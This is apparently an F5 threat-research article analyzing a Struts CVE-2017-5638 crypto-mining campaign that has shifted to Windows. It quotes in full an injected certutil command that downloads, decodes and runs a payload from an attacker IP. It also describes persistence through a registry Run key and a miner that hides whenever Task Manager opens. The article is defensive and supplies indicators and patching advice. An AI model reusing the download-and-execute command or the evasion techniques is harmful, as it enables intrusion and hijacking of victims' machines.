Cryptojacking
March 28, 2018

Old Dog, New Targets: Switching to Windows to Mine Electroneum

article
8 min. read
By Andrey Shalnev
  • The long-running Apache Struts 2 Jakarta Multipart Parser remote code execution (RCE) (CVE-2017-5638) crypto-mining campaign is now targeting Windows, not just Linux systems.
  • The campaign is mining Electroneum coin (ETN),
  • The Windows built-in tool certutil is used to download the malware in base64 encoded format.
  • The malware specifically detects the ESET antivirus software.
  • Like some other crypto-miners, it hides by terminating itself when Windows Task Manager is opened to check running processes or machine performance.
  • Malware hosting servers are based in Las Vegas, Nevada.

Since July of 2017, F5 researchers have been monitoring a campaign exploiting the Apache Struts 2 Jakarta Multipart Parser remote code execution (RCE) vulnerability (CVE-2017-5638). This campaign began by infecting Struts systems running on the Linux operating system to mine Electroneum crypto-currency. It’s often the case that, as the time passed, the attackers decide to expand their mining operations to new targets.

New Target: Windows Systems

In Figure 1, an example of the original attack request shows that the attackers were initially injecting Linux shell payload that was using the built-in Linux “wget” and “curl” tools to download the miner malware and add it as a “cron” job for persistence.

 

Figure 1: Original attack request targeting Linux servers

Figure 1: Original attack request targeting Linux servers

 

In mid-March, 2018, F5 researchers observed a shift in the existing campaign wherein the injected payload changed to target Windows-based Struts servers.

 

Figure 2: Latest attack request targeting Windows servers

Figure 2: Latest attack request targeting Windows servers

 

As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file.

Using the Windows certutil Tool

While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to download and upload jobs. We have already have witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe

The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.

“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”

However, a lesser known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using base64 encoding certificate format, as shown in Figure 3.

 

Figure 3: Content of update.b64 file before decoding

Figure 3: Content of update.b64 file before decoding

 

Once the file is downloaded and base64-decoded using certutil, it is saved as update.exe and executed.

As shown in Figure 4, the metadata for the file indicates that the executable file most likely was created on January 30, 2018.

 

Figure 4: Downloaded executable file metadata

Figure 4: Downloaded executable file metadata

Installing Malware Like a Boss

The file itself is a Windows installer that was created using a legitimate NSIS (Nullsoft Scriptable Install System) tool.

“NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers. It is designed to be as small and flexible as possible and is therefore very suitable for internet distribution.”

While most malwares implement their own downloader to evade detection, the current attacker is not even trying to hide and is using a more obvious way to install it, which requires just scripting knowledge.

 

Figure 5: The update.exe file content indicating it was created using the NSIS software

Figure 5: The update.exe file content indicating it was created using the NSIS software

 

The installer script language is compatible with all major versions of Windows and provides an easy API to interact with different components of the operating system using simple syntax.

The installer contains three DLL files that are part of the NSIS system and enable it to execute certain commands.

 

Figure 6: The content of the installer archive file

Figure 6: The content of the installer archive file

Issues with ESET Antivirus?

Once the installer is executed, it sleeps for 16 seconds and checks for the presence of ESET antivirus on the vulnerable machine. There is no obvious explanation why the attacker chooses to check specifically for ESET antivirus.

If the ESET antivirus presents, the installer will use nsisdl.dll to download a file called nod.lock and stop the installation process. Unfortunately, we were not able to get the file during the analysis of this campaign. Strangely, this file is not being executed or mentioned further in the code.

 

Figure 7: Search for “c:\Program Files\ESET” directory and download of “nod.lock”

Figure 7: Search for “c:\Program Files\ESET” directory and download of “nod.lock”

Running the Malware

If ESET antivirus is not present on the vulnerable machine, the installer checks the operation system architecture using system.dll plug-in and downloads “msi32.zip” or “msi64.zip” accordingly.

 

Figure 8: Download of msi32.zip or msi64.zip

Figure 8: Download of msi32.zip or msi64.zip

 

The file is downloaded to the %appdata%/MSSearchIndexer folder and unzipped using the ZipDLL.dll module, which contains only a few files. The extracted zip file is then removed from the target system.

 

Figure 9: Contents of the “msi32/64.zip” file

Figure 9: Contents of the “msi32/64.zip” file

 

The installer then executes the malicious SerachIndexer.exe file, which in turn starts the mssearch.exe file. The reason behind this execution concatenation will be soon explained.

 

Figure 10: Unzipping and executing “SearchIndexer.exe”

Figure 10: Unzipping and executing “SearchIndexer.exe”

 

For persistence, the installer adds a registry entry to run this file on startup.

 

Figure 11: The added registry entry

Figure 11: The added registry entry

The Miner

The extracted mssearch.exe file is a fork of cpuminer project called CPUMiner-Multi. The main difference between the two miners is that the CPUMiner multi-supports more algorithms than the original one. In this case, the miner is configured to mine Electroneum (ETN) cryptocurrency.

 

Figure 12: “Mssearch.exe” output while executed without arguments

Figure 12: “Mssearch.exe” output while executed without arguments

 

Looking at the search.cf miner configuration file, we can see the mining pool address with the wallet public address.

 

Figure 13: The content of the miner configuration file

Figure 13: The content of the miner configuration file

 

The pool server itself is located in Germany, as shown in Figure 14.

 

Figure 14: Pool server location

Figure 14: Pool server location

 

To date, the Windows operation seems not to be extremely profitable as the mined amount for a few days is only about $20.00. Not quite the large payouts we’ve seen from other cryptomining campaigns.

 

Figure 15: Mining pool and attacker’s wallet information

Figure 15: Mining pool and attacker’s wallet information

Hiding from Tasks Manager

As mentioned before, the MSSearchIndexer.exe executable file is starting the mssearch.exe miner, while it is also responsible for hiding the mining operation.

Figure 16: Execution of “mssearch.exe” process

Figure 16: Execution of “mssearch.exe” process

 

Because an infected user might try to check why their machine is so slow by opening the Windows Task Manager to view the CPU and memory performance, the process contantly checks to see whether Windows Task Manager is being opened on the target system. If it is, the mssearch.exe process will be killed or won’t start if it is already open. This can be seen in figures 17 – 20.

 

Figure 17: Searching for “taskmgr” in process list

Figure 17: Searching for “taskmgr” in process list

 

Figure 18: Termination command

Figure 18: Termination command

 

Figure 19: “mssearch.exe” process terminated

Figure 19: “mssearch.exe” process terminated

 

Once the task manager is closed, MssearchIndexer.exe will start the mining process again.

 

Figure 20: Restarting the “mssearch.exe” process

Figure 20: Restarting the “mssearch.exe” process

Indicators of Compromise

IP addresses:

  • 45[.]77[.]55[.]231
  • 181[.]214[.]87[.]240
  • 181[.]214[.]87[.]241
  • 148[.]251[.]133[.]246

Files:

  • update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56
  • update.exe: 5bb5d3cb837d97174eddc681ca98aa80
  • msi64.zip: 8d8b8abe93aea52f9865f045a49912ae
  • SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d
  • mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f2

 

Figure 21: 45.77.55.231 server information

Figure 21: 45.77.55.231 server information

 

Figure 22: 181.214.87.240 server information

Figure 22: 181.214.87.240 server information

 

Figure 23: 181.214.87.241 server information

Figure 23: 181.214.87.241 server information

 

Figure 24: 148.251.133.246 server information

Figure 24: 148.251.133.246 server information

Summary

Crypto-mining campaigns are very popular nowadays, and the Monero (XMR) currency is the common choice for cybercrime. This campaign is an interesting example of attackers shifting operations to mine another currency. Both Monero and Electroneum use the CryptoNight algorithm, which is just as suitable to mine on a CPU as it is on a GPU. This explains why the attackers chose to mine on compromised web servers. Because Electroneum and Monero are not the only cryptocurrency that provide this behavior, we can expect to see attackers extend their campaigns to other cryptocurrencies, as well, in the future.

To prevent this attack on your applications, simply patch the Apache Struts 2 Jakarta Multipart Parser remote code execution CVE-2017-5638 and (or) implement a web application firewall to block the attack.

Need-to-Know

Expertly picked stories on threat intelligence

Hundreds of apps will be attacked by the time you read this.

So, we get to work. We obsess over effective attack methods. We monitor the growth of IoT and its evolving threats. We dive deep into the latest crypto-mining campaigns. We analyze banking Trojan targets. We dissect exploits. We hunt for the latest malware. And then our team of experts share it all with you. For more than 20 years, F5 has been leading the app delivery space. With our experience, we are passionate about educating the security community-providing the intel you need to stay informed so your apps can stay safe.

Every

9 hrs

a critical vulnerability—with the potential for remote code execution—is released.